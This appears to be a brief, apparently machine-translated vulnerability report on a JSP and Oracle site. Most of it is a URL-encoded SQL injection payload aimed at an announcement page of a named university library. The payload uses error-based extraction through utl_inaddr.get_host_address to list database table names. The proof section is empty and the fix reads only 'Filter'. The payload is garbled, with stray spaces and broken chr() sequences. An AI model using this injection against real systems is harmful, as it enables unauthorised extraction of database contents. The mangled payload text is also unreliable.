Brief description: JSP + ORACLE
Http://www.lib.tsinghua.edu.cn/homepage/announce_view.jsp? Id = 2217% 27 + or + 1% 3Dutl_inaddr.get_host_address % 28% 28% 28 select + distinct + chr % 28126% 29% 7C % 7 Cchr % 2839% 29% 7C % 7 Ccast % 28table_name + as + char % 2850% 29% 29% 7C % 7 Cchr % 2839% 29% 7C % 7 Cchr % 28126% 29 + from + % 28 select + distinct + rownum + r % 2Ctable_name + from + all_tables + where + owner <> chr % 2883% 29% 7C % 7 Cchr % 2889% 29% 7C % 7 Cchr % 2883% 29 + and + owner + <> chr % 2883% 29% 7C % 7 Cchr % 2889% 7C % 7 Cchr % 2883% 29% 7C % 7 Cchr % 2884% 29% 7C % 7 Cchr % 2869% 29% 7C % 7 Cchr % 2877% 29 + and + owner <> chr % 2867% 29% 7C % 7 Cchr % 2884% 29% 7C % 7 Cchr % 2888% 29% 7C % 7 Cchr % 2883% 29% 7C % 7 Cchr % 2889% 29% 7C % 7 Cchr % 2883% 29 + and + owner <> chr % 2887% 29% 7C % 7 Cchr % 2877% 29% 7C % 7 Cchr % 2883% 7C % 7 Cchr % 29% 2889% 7C % 7 Cchr % 29% 29 + and + owner <> chr % 2883% 2877% 7C % 7 cchr % 2868% 29% 7C % 7 Cchr % 2883% 29% 7C % 7 Cchr % 2889% 29% 7C % 7 Cchr % 2883% 29 + and + owner <> chr % 2879% 29% 7C % 7 Cchr % 2876% 29% 7C % 7 Cchr % 2865% 29% 7C % 7 Cchr % 2880% 29% 7C % 7 Cchr % 2883% 29% 7C % 7 Cchr % 2889% 29% 7C % 7 Cchr % 2883% 29 where + r % 3D21% 29% 29% 29 + and + % 271% 27% 3D % 271
Proof of vulnerability:
Fix: Filter